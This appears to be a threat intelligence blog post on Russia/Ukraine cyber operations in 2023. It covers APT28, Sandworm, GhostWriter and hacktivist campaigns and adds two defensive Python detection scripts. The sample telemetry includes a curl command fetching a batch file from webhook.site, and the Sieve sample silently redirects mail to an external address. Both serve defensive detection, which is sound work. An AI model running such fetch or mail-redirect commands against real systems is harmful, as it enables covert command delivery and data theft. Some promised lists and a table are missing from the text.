December 6, 2023
The Russia/Ukraine war is approaching its second year, and both physical and cyber warfare continue. Ukraine has continued to conduct defensive strategies, while cybercriminal groups have also persisted in launching DDoS, information stealing, and wiper attacks. Russia has launched further attacks while dealing with internal struggles. The war has caused a rippling effect of destruction and disruption across the world, including a persistent impact within the cybercriminal landscape.
Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian and Ukrainian actions as well as estimated cyber-related implications in advisories and Optiv blog posts on February 4, February 22, February 24, June 30, August 25, September 29, October 31, November 29, December 20, March 02, 2023, May 30, 2023 and August 25, 2023. This update will provide information on the events of the previous 90 days and what we can expect looking forward.
This will be the last quarterly update related to the ongoing Russia/Ukraine conflict. Optiv’s gTIC will provide updates via blog posts and advisories on an ad-hoc basis.
In June 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) warned that the Russia-linked threat group, APT28 (aka BlueDelta, Sofacy, PawnStorm, Fancy Bear, Forest Blizzard, FROZENLAKE) had conducted phishing attacks with malicious attachments that exploited vulnerabilities in Roundcube servers (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to run reconnaissance and exfiltrate sensitive data. The scripts redirected incoming emails and gathered session cookies, user information, and address books. CERT-UA reported that phishing emails were sent to more than 40 government organizations.
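The mail-redirection behaviour described above is something defenders can audit for directly. The following Python is an added example (not from the CERT-UA advisory or Optiv's own tooling) that scans per-mailbox filter scripts for redirect actions pointing outside the organization. It assumes the filters are stored as server-side Sieve scripts, as Roundcube's managesieve plugin does; the mailbox scripts and the internal domain gov.example are constructed for illustration.

```python
import re

# Assumption: the organization's own mail domains; any other domain is external.
INTERNAL_DOMAINS = {"gov.example"}

# Sieve "redirect" action, optionally with the :copy tag, followed by a quoted address.
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)
# Sieve comments: '#' to end of line, or bracketed /* ... */ blocks.
# Simplification: a '#' inside a quoted string would also be stripped.
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.DOTALL)


def strip_comments(script):
    return COMMENT_RE.sub("", script)


def redirect_targets(script):
    """Return every address a Sieve script redirects mail to, ignoring comments."""
    return [m.group(1).strip().lower() for m in REDIRECT_RE.finditer(strip_comments(script))]


def is_external(address, internal_domains=INTERNAL_DOMAINS):
    domain = address.rpartition("@")[2]
    return domain not in {d.lower() for d in internal_domains}


def audit_sieve(scripts, internal_domains=INTERNAL_DOMAINS):
    """scripts: mapping of mailbox -> Sieve script text.
    Returns (mailbox, external_target) pairs worth a closer look."""
    findings = []
    for mailbox, script in scripts.items():
        for target in redirect_targets(script):
            if is_external(target, internal_domains):
                findings.append((mailbox, target))
    return findings


# Constructed sample scripts: one benign filter, one silent external mirror,
# one internal forward, and one commented-out (inactive) redirect.
SAMPLE_SCRIPTS = {
    "analyst@gov.example": 'require ["fileinto"];\n'
                           'if header :contains "subject" "newsletter" { fileinto "Lists"; }\n',
    "clerk@gov.example": 'require ["copy"];\n'
                         '# silently mirror everything\n'
                         'redirect :copy "collector@mail.example.net";\n'
                         'keep;\n',
    "deputy@gov.example": 'if address :is "from" "minister@gov.example" '
                          '{ redirect "assistant@gov.example"; }\n',
    "auditor@gov.example": '/* redirect "old@ext.example" was removed */\nkeep;\n',
}

if __name__ == "__main__":
    for mailbox, target in audit_sieve(SAMPLE_SCRIPTS):
        print(f"{mailbox}: mail redirected to external address {target}")
```

Run it against an export of every user's active Sieve script; the internal-forward case is deliberately left unflagged so the output stays short enough to review by hand, and a `:copy` redirect is the variant to treat as most suspicious because the user keeps seeing their mail and notices nothing.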
In October 2023, CERT-UA shared that threat actors tracked as UAC-0165 had “interfered” with at least 11 Ukrainian telecommunications organizations between May and September 2023, which led to service interruptions that impacted customers. The threat group conducted reconnaissance and post-exploitation activities from previously compromised servers and utilized two programs, POEMGATE and POSEIDON, which enable credential theft and remote control of the infected hosts. The group also reportedly used a utility called WHITECAT to erase any forensic trail. Once the group successfully breached the network, they attempted to disable network and MikroTik server equipment, as well as data storage systems.
In May 2023, CERT-UA reported that threat actors tracked as UAC-0006 had conducted a phishing campaign with invoice-themed lures to deploy the SmokeLoader malware in a polyglot file. CERT-UA regards this as a financially motivated operation designed to steal credentials and make unauthorized transfers of funds. In another advisory from April 2023, CERT-UA warned of destructive attacks attributed to UAC-0165 against public sector organizations. The group deployed a script-based wiper malware called RoarBAT, which searched for files matching a specific list of extensions and then used the legitimate WinRAR utility to permanently delete them. CERT-UA attributed UAC-0165 to the Russia-linked Sandworm Team (aka FROZENBARENTS, SeaShell Blizzard, Voodoo Bear), which has historically used wiper malware to target Ukrainian organizations.
In July 2023, CERT-UA reported discovering Microsoft Excel (.xls) documents containing both a legitimate macro and a malicious macro that launches the PicassoLoader malware, which subsequently executes the njRAT malware. CERT-UA attributed this activity to UAC-0057 (aka GhostWriter), a threat actor that they had also observed sending phishing emails with malicious attachments containing an exploit for CVE-2023-38831 (CVSS 7.8), a vulnerability impacting WinRAR archiving software. The adversary’s goal was to deploy the Cobalt Strike beacon, followed by the PicassoLoader malware. The use of njRAT, a strain of malware active since 2010, demonstrates that threat actors do not necessarily have to create custom or bespoke malware when older and simpler tools and procedures are still effective.
In July 2023, security researchers with BlackBerry reported that the threat actors behind the RomCom malware had carried out phishing attacks against Ukraine and supporting countries just before a NATO Summit in Lithuania. The threat actor appeared to use this important, Ukraine-specific event as a lure to push the malware to victims, and researchers discovered a website impersonating the Ukrainian World Congress non-profit organization. The execution chain used in this campaign exploited the Follina remote code execution vulnerability, CVE-2022-30190, which impacts Microsoft's Support Diagnostic Tool (MSDT). Reported in May 2022, this vulnerability is an attractive attack vector for threat actors of all sophistication levels. Optiv’s gTIC conducted analysis of more than 45 ransomware groups and 26 APT groups across multiple countries, including Russia, North Korea, China, and Iran, and identified 5 ransomware groups and 13 APT groups that have been observed exploiting the Follina vulnerability since its disclosure.
In August 2023, Microsoft security researchers reported that Midnight Blizzard (aka Nobelium, APT29, UNC2452, and Cozy Bear) was observed using Microsoft Teams to mount targeted campaigns aimed at stealing Microsoft 365 passwords and pivoting into organizations’ Azure Active Directory and other sensitive environments. The group reportedly targeted 40 global government, technology, manufacturing, and media organizations. Midnight Blizzard used previously compromised valid accounts to send social engineering messages while impersonating technical support. The threat actor attempted, in some cases, to add a device to the organization as a managed device via Microsoft Entra ID. While the victims of these campaigns were located worldwide, there is an Even Chance that future attacks and espionage/information gathering campaigns carried out by APT29 will be targeted toward organizations in Ukraine and NATO countries to gather strategic information.
In August 2023, U.S. federal agencies and international partners in the U.K., New Zealand, Australia, and Canada published a report warning that the Sandworm Team threat actor was deploying a new strain of malware called “Infamous Chisel.” This malware, while not highly sophisticated, enables persistent remote access to infected Android devices over the TOR network and the subsequent exfiltration of strategic system information that would provide value to the Russian government.
In September 2023, CERT-UA reported that it stopped a cyberattack attributed to APT28 against an unnamed Ukrainian critical energy infrastructure facility. The attack began with a phishing email that, once the victim clicked it, activated an infection chain and downloaded a malicious ZIP archive. Persistence was established with a scheduled task, and remote code execution was achieved by using cURL to retrieve commands through a legitimate service called webhook.site.
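The chain above (scheduled task for persistence, cURL reaching out to webhook.site for commands) is a pattern defenders can hunt for in endpoint telemetry. The following Python is an added example, not code from the CERT-UA report or from Optiv, that triages process-creation events and escalates a cURL request to webhook.site when the parent is the Windows Task Scheduler. The JSON-lines event shape, host names, parent-process conventions (taskeng.exe or the svchost instance running the Schedule service) and the webhook path are all constructed assumptions to be adapted to the telemetry actually in use.

```python
import json
import re
from urllib.parse import urlparse

# Domain of the legitimate service abused for command delivery in the report.
WEBHOOK_DOMAINS = ("webhook.site",)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
CURL_NAMES = {"curl.exe", "curl"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def launched_by_scheduler(event):
    """True when the parent is the Task Scheduler host: taskeng.exe, or the
    svchost instance hosting the Schedule service. Assumption: typical Windows
    process names; adjust for the EDR/Sysmon fields you actually have."""
    parent = basename(event.get("parent_image", ""))
    if parent == "taskeng.exe":
        return True
    return parent == "svchost.exe" and "-s schedule" in event.get("parent_cmdline", "").lower()


def webhook_hosts(cmdline):
    """Hostnames in the command line that are webhook.site or a subdomain of it
    (a lookalike such as webhook.site.evil.example is deliberately not matched)."""
    hosts = []
    for url in URL_RE.findall(cmdline):
        host = (urlparse(url).hostname or "").lower()
        if host in WEBHOOK_DOMAINS or host.endswith(tuple("." + d for d in WEBHOOK_DOMAINS)):
            hosts.append(host)
    return hosts


def classify(event):
    """Return None for uninteresting events, else a finding with severity and reasons."""
    if basename(event.get("image", "")) not in CURL_NAMES:
        return None
    hosts = webhook_hosts(event.get("cmdline", ""))
    if not hosts:
        return None
    reasons = ["curl to " + ", ".join(hosts)]
    severity = "medium"
    if launched_by_scheduler(event):
        reasons.append("parent is Task Scheduler (persistence)")
        severity = "high"
    return {"host": event.get("host"), "severity": severity,
            "reasons": reasons, "cmdline": event.get("cmdline")}


def triage(lines):
    findings = []
    for line in lines:
        finding = classify(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real logs): one scheduled-task beacon, one
# hand-run curl to the same service, a scheduled curl to an internal server,
# and a browser visiting the service's documentation.
SAMPLE_EVENTS = [
    {"host": "ws-17", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s https://webhook.site/00000000-constructed-id -o C:\Users\Public\cmd.bat",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "parent_cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"host": "ws-22", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl https://webhook.site/test-hook",
     "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe"},
    {"host": "ws-05", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl https://updates.corp.example/inventory",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "parent_cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"host": "ws-09", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "firefox.exe https://webhook.site/docs",
     "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f["severity"].upper(), f["host"], "; ".join(f["reasons"]))
```

The scheduler check is what separates a one-off curiosity from persistence: the same request from an interactive shell is worth a look, but the same request fired by a task every few minutes is the beacon pattern the advisory describes.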
In September 2023, Reuters reported that “Russian spies were using hackers to target computer systems at law enforcement agencies in Ukraine in a bid to identify and obtain evidence related to alleged Russian war crimes,” according to Ukraine’s cyber defense chief. Reuters also indicates that these adversaries have increased their targeting of the Ukrainian Prosecutor General’s office and “departments documenting war crimes.” Ukraine’s cyber defense chief reported that the focus of Russia-linked APT groups has shifted from energy facilities to law enforcement agencies, which had previously not been targeted. The purported goal of the campaigns, according to Reuters, was to help Russian individuals “avoid prosecution and move them back to Russia.”
In October 2023, the website of the British royal family suffered a DDoS attack that the Russian-linked threat group, KillNet, claimed responsibility for. The site was down for nearly 90 minutes, and the threat group reportedly did not gain access to its systems, content, or site. The website was targeted days after King Charles condemned the invasion of Ukraine, indicating that the DDoS attack was Likely in retaliation for speaking against the Russian actions. KillNet has previously targeted government websites within Europe, including the European Parliament website after the lawmakers approved a resolution calling Moscow a state sponsor of terrorism in November 2022.
In October 2023, a Ukrainian official stated that Russian cyberattacks had become more sophisticated and frequent, with the daily goal of disrupting vital infrastructure. Deputy Foreign Minister Anton Demokhin reported that the cyberattacks, while not as devastating as expected, were consuming significant time, attention, and resources to defend networks and prevent damage and further disruption. Ukraine recorded 3,974 cyber incidents between January 2022 and September 2023, with most coming from Russian attackers.
In October 2023, the Cyber Army of Russia Reborn, a Russian-affiliated threat group, openly advertised for a “chat admin or moderator” position on cybercriminal forums. The Cyber Army of Russia Reborn is a hacktivist group that is widely believed to be a replica of another hacktivist group, IT Army of Ukraine. The Cyber Army of Russia reportedly conducts DDoS attacks on Ukrainian organizations and on government agencies of countries that support Ukraine. The group has claimed that conflicts and geopolitical tensions are the motivation for their attacks. It is not clear why the Cyber Army of Russia Reborn advertised for a position openly on the dark web. However, it raises concerns for security researchers about the group’s intentions. There is an Even Chance that this position advertisement indicates that the group is seeking to strengthen capabilities and expand operations.
The IT Army of Ukraine, a collective that has nearly 10,000 volunteers, continues to be active against Russian organizations. The group claimed responsibility for temporarily disabling internet services in some of the territories occupied by the Russian army. The group reportedly conducted attacks against the Russian internet providers Miranda-media, Krimtelekom, and MirTelekom, and has invited supporters to install its software to increase the size of its botnet. As with most DDoS attacks, the companies mitigated the attacks and restored services within 24 hours.
In October 2023, Recorded Future indicated that Ukrainian hackers had reportedly teamed up with the nation’s security services, the SBU, to “breach Russia’s largest private bank” and “obtain the data of more than 30 million customers.” These hackers told Recorded Future that they would share this data with journalists.
In October 2023, the Ukrainian Cyber Alliance (UCA), a Ukrainian hacktivist group, infiltrated and disrupted the Trigona ransomware operation. Formed in 2021, the UCA comprises volunteers worldwide who purportedly work to defend the country’s cyberspace against Russian attacks. UCA hackers reportedly gained access to the Trigona ransomware infrastructure by leveraging a public exploit for CVE-2023-22515 (CVSS 9.8) in Confluence Data Center and Server. UCA maintained persistence and eventually wiped the servers completely.
Based on ransomware variant similarities, the Trigona ransomware group is believed to have ties to the Russia-linked Alphv ransomware operation (aka BlackCat). The UCA reported that they would provide decryption keys found in the stolen data and any relevant information to law enforcement agencies.
From August to September 2023, the U.S. Cyber Command (CYBERCOM) deployed a team of cyberwarfare experts in Lithuania, which borders Moscow’s heavily militarized Kaliningrad enclave, to conduct a “defensive hunt operation.” The specialists reportedly searched for evidence of malicious activities, and the purported goal of the operation was to “defend the nation in and through cyberspace.” The operation was not conducted to directly benefit Ukraine, but rather because the same threat actors often conduct operations against NATO countries like Lithuania. Russia-linked cyberattacks targeting NATO countries in 2022 increased by 300%. Operations like the one conducted by CYBERCOM can be helpful in information sharing and mitigation techniques.
Since the start of the Russia/Ukraine conflict, thousands of people have joined hacktivist and hacker groups. While many of their attacks are DDoS attacks or otherwise unsophisticated, they have caused temporary disruption of business and operations in critical verticals including banks, pharmacies, hospitals, transportation services, and government operations.
In October 2023, the International Committee of the Red Cross (ICRC) published its first set of rules of engagement for civilian hackers. The rules have been dubbed a “Geneva Code” of cyber warfare and include the following eight quoted rules.
Both Ukrainian and Russian hacking groups have reported that they will work to de-escalate cyberattacks and comply with the rules that have been proposed. One of the groups, KillNet, reported to BBC News that they agree to the terms and rules, and it should be considered as a first step from the group towards peace. Additionally, the IT Army of Ukraine has vowed to avoid cyberattacks that would impact civilians.
If the commitments to follow these rules are sincere, there will Likely be a reduction in the number of cyberattacks causing disruptions to civilian operations over the next 12 months. However, these vows have previously proven to be untrue or unsuccessful. For example, in 2020, multiple ransomware groups – Maze, REvil, DoppelPaymer, and more – vowed to avoid healthcare organizations during the COVID-19 pandemic, which lasted for a few months before healthcare organizations were targeted again. Therefore, there is an Even Chance that the hacker groups will continue to target organizations and cause disruptions that affect civilians over the next 12 months.
In September 2023, the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) released a report covering Russia’s cyber tactics in the first half of 2023. The goal of the report is to help Ukrainian cybersecurity specialists and international partners in mitigating and defending against Russia-linked cyberattacks. The report highlighted an increase in Russia-linked threat actors’ attention on law enforcement agencies, energy and media organizations, and noted that their targeting of Ukraine has more than doubled (1.9 incidents per day in H2 2022 to 4-5 per day in H1 2023). There were 342 confirmed incidents targeting Ukraine in the second half of 2022, and 762 in the first half of 2023 – an increase of 123%. The analysis revealed that Russia-linked threat actors often revisit victims that handle and maintain critical data of interest to the Russian military. This report, along with reports from Mandiant, highlights the increased use of living-off-the-land (LOTL) techniques observed in Russia-linked cyberattacks.
This type of report can be incredibly beneficial in information sharing operations, which enable accurate mitigation techniques and the spread of knowledge on groups’ and malware activities. It is Likely that Russia-linked threat groups will continue to target Ukraine and NATO countries, improve their TTPs, and identify ways to conduct more complex and successful attacks over the next 12 months. Also over the next 12 months, it is Likely that Russia-linked groups will increasingly focus on evading detection and conducting long-term espionage attacks targeting Ukraine and supporting countries to steal sensitive information that would be of strategic value to the Russian government.
Other countries that have a history of state-sponsored and/or APT attacks and have indirectly aligned with Russia or maintained suspicious neutrality towards it include China and India, which could also pose additional risks or act as proxies for cyberattacks. While China has ultimately avoided physical involvement in the war, it has maintained a suspicious balance between suspending and continuing trade and business. China-linked threat groups have also parroted Russian narratives where they aligned with China’s criticism of the U.S. Despite a focus on the U.S., there is an Even Chance that these groups could target countries of strategic interest to Russia over the next 12 months.
It is Likely that Russian and Ukrainian hackers will continue to target vulnerabilities in ubiquitous software over the next 12 months. In addition to multiple vulnerabilities, Optiv’s gTIC assesses it is Likely that cybercriminals and fringe state-sponsored campaigns will use common software and malware in the coming months, such as:
It is Likely that threat actors will continue to use the same tactics observed in cyberattacks attributed to Russia-linked and Russia-supporting groups.
Table 1: MITRE ATT&CK techniques observed in reported cyberattacks related to the Russia/Ukraine conflict